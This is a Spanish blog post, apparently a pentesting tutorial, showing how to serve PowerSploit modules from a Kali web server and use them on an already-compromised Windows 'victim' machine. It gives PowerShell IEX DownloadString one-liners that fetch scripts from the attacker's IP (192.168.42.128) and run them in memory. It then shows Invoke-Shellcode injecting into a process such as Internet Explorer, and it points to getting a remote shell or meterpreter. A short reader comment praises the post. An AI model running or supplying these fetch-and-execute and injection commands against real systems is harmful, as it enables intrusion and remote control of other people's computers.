El objetivo en este post es hacer un ejemplo de esta herramienta, para que así puedas profundizar más con ella. Voy a hacer uso de Kali Linux, que ya cuenta con esta magnífica herramienta (te la puedes descargar del enlace al GitHub puesto arriba), abrimos una terminal y nos movemos a la siguiente ruta > /usr/share/powersploit. Ahí podemos ver como se dividen los distintos módulos con ls:
Voy a poner en marcha un servidor web, donde copiaremos el contenido. Aquí haré uso de Apache, pero podéis usar otra opción rápida como Python…
Dentro de un navegador se puede comprobar el contenido del servidor, podemos ver todo el contenido que listamos anteriormente usando ls.
Ahora vamos a ver cómo se puede hacer uso, partimos de que ya tenemos el control de una máquina víctima.
Para poder ejecutar un código de la herramienta, hacemos uso del siguiente comando:
IEX(New-Object Net.WebClient).DownloadString("http://192.168.42.128/ps/script-path ")
Aquí no se va a explicar los comandos, quédate con la idea de que nos descargamos el script y se ejecuta en memoria. Puedes revisar la siguiente página de Microsoft.
Vemos aquí que indicamos la dirección IP de nuestro servidor, y el directorio donde se encuentra el script, por ejemplo, si queremos descargar el script: Invoke-Shellcode.ps1, ejecutamos:
IEX(New-Object Net.WebClient).DownloadString("http://192.168.42.128/ps/CodeExecution/Invoke-Shellcode.ps1")
Y para obtener el prompt: Invoke-Shellcode
Vemos que podemos inyectarlo sin PID (se inyecta en el proceso de PowerShell), si no en el proceso que indiquemos, en este caso internet explorer. Para la prueba no he indicado ningún payload (-Payload), ¿y qué pasa? se abre la calculadora, sin más. Pero podemos abrir una terminal con destino a otro equipo remoto, o mejor, darnos un meterpreter :D. Dejo un par de capturas (primero se pone a la escucha el handler con el payload y luego se ejecuta el código que se ve en la PowerShell):
Una herramienta muy conocida y muy recomendable tenerla en nuestro arsenal, nos vemos en las próximas entradas. Saludos.
Excelente y muy de acuerdo con la idea de tenerno dentro del arsenal
ResponderEliminar